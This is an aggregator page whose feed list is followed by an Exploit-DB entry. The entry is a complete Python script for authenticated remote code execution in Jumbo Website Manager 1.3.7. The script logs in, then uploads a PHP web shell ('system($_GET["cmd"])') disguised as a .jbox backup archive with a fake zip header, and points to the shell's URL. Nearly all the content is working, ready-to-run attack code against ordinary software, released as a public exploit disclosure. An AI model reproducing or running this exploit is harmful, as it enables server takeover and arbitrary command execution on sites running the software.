惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

P
Palo Alto Networks Blog
P
Proofpoint News Feed
GbyAI
GbyAI
Microsoft Azure Blog
Microsoft Azure Blog
B
Blog
Google DeepMind News
Google DeepMind News
N
Netflix TechBlog - Medium
Recorded Future
Recorded Future
M
MIT News - Artificial intelligence
罗磊的独立博客
J
Java Code Geeks
月光博客
月光博客
F
Full Disclosure
博客园 - 聂微东
人人都是产品经理
人人都是产品经理
U
Unit 42
WordPress大学
WordPress大学
A
About on SuperTechFans
C
Cyber Attacks, Cyber Crime and Cyber Security
SecWiki News
SecWiki News
Security Latest
Security Latest
C
Check Point Blog
C
CERT Recently Published Vulnerability Notes
小众软件
小众软件
I
InfoQ
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
B
Blog RSS Feed
V
Visual Studio Blog
博客园_首页
NISL@THU
NISL@THU
I
Intezer
Spread Privacy
Spread Privacy
AWS News Blog
AWS News Blog
The Register - Security
The Register - Security
D
Darknet – Hacking Tools, Hacker News & Cyber Security
Latest news
Latest news
Project Zero
Project Zero
博客园 - 叶小钗
C
Cybersecurity and Infrastructure Security Agency CISA
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
P
Privacy International News Feed
博客园 - 【当耐特】
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
T
Threat Research - Cisco Blogs
Simon Willison's Weblog
Simon Willison's Weblog
T
Tor Project blog
V
Vulnerabilities – Threatpost
博客园 - 司徒正美
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
雷峰网
雷峰网

Exploit-DB.com RSS Feed

MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive
OffSec’s Exploit Database Archive
Mirabbas Ağalarov · 2026-04-09 · via Exploit-DB.com RSS Feed
#Exploit Title: Jumbo Website Manager  - Remote Code Execution 
#Application: Jumbo Website Manager
#Version: v1.3.7
#Bugs:  RCE
#Technology: PHP
#Vendor URL: https://sourceforge.net/projects/jumbo/
#Software Link: https://sourceforge.net/projects/jumbo/
#Date of found: 28.10.2025
#Author: Mirabbas Ağalarov
#Tested on: Linux 


import requests
from typing import Tuple, Optional

class JumboCMSExploit:
    def __init__(self, base_url: str = "http://localhost"):
        self.base_url = base_url
        self.session = requests.Session()
        
    def login(self, username: str, password: str) -> bool:
        """
        Login to Jumbo CMS
        
        Args:
            username: Username
            password: Password (already hashed)
            
        Returns:
            True if login successful, False otherwise
        """
        print(f"[*] Attempting login as: {username}")
        
        url = f"{self.base_url}/jumbo_files/jumbo/p_login.php"
        
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0",
            "Content-Type": "application/x-www-form-urlencoded",
            "Origin": self.base_url,
            "Referer": f"{self.base_url}/jumbo_files/jumbo/loginpage.php",
        }
        
        data = {
            "username": username,
            "password": password
        }
        
        response = self.session.post(url, headers=headers, data=data, allow_redirects=False)
        
        if response.status_code in [200, 302]:
            print(f"[+] Login successful! Status: {response.status_code}")
            print(f"[+] Cookies: {self.session.cookies.get_dict()}")
            return True
        else:
            print(f"[-] Login failed! Status: {response.status_code}")
            return False
    
    def upload_file(self, filename: str, content: bytes) -> Tuple[bool, str]:
        """
        Upload a file to the backup manager
        
        Args:
            filename: Name of file to upload (e.g., test.phar)
            content: Binary content of the file
            
        Returns:
            Tuple of (success, response_text)
        """
        print(f"[*] Uploading file: {filename}")
        
        url = f"{self.base_url}/jumbo_files/jumbo/backupmanager/fileupload/php.php"
        
        params = {"qqfile": filename}
        
        # Disguise .phar as .jbox
        display_name = filename.replace('.phar', '.jbox')
        
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0",
            "Accept": "*/*",
            "X-Requested-With": "XMLHttpRequest",
            "X-File-Name": display_name,
            "Content-Type": "application/octet-stream",
            "Origin": self.base_url,
            "Referer": f"{self.base_url}/jumbo_files/jumbo/backupmanager/loadbackup.php",
        }
        
        response = self.session.post(url, params=params, headers=headers, data=content)
        
        if response.status_code == 200:
            print(f"[+] Upload successful!")
            print(f"[+] Response: {response.text}")
            return True, response.text
        else:
            print(f"[-] Upload failed! Status: {response.status_code}")
            return False, response.text
    
    def exploit(self, username: str, password: str, filename: str, php_code: str) -> bool:
        """
        Complete exploit: Login + Upload
        
        Args:
            username: Login username
            password: Login password (hashed)
            filename: Filename to upload
            php_code: PHP code to execute
            
        Returns:
            True if exploit successful
        """
        # Step 1: Login
        if not self.login(username, password):
            print("[-] Exploit failed at login stage")
            return False
        
        # Step 2: Create malicious file content
        # PK header to disguise as archive
        file_content = b'PK\x03\x04\x0a\x00\x00\x00\x00\x00' + php_code.encode()
        
        # Step 3: Upload
        success, response = self.upload_file(filename, file_content)
        
        if success:
            print("\n[+] Exploit completed successfully!")
            uploaded_path = f"{self.base_url}/jumbo_files/jumbo/backupmanager/fileupload/uploads/backup.phar?cmd=whoami"
            print(f"[+] File possibly uploaded to: {uploaded_path}")
            return True
        else:
            print("[-] Exploit failed at upload stage")
            return False


if __name__ == "__main__":
    print("="*70)
    print("Jumbo CMS Authenticated RCE via File Upload Exploit")
    print("="*70)
    print()
    
    # Configuration
    TARGET = "http://localhost"
    USERNAME = "admin"
    PASSWORD = "6f7303f028531527b2da3620ccaf25ee384ae7db"  
    FILENAME = "test123.phar"
    PHP_CODE = '<?php echo system($_GET["cmd"]);?>'
    
    # Run exploit
    exploit = JumboCMSExploit(TARGET)
    exploit.exploit(USERNAME, PASSWORD, FILENAME, PHP_CODE)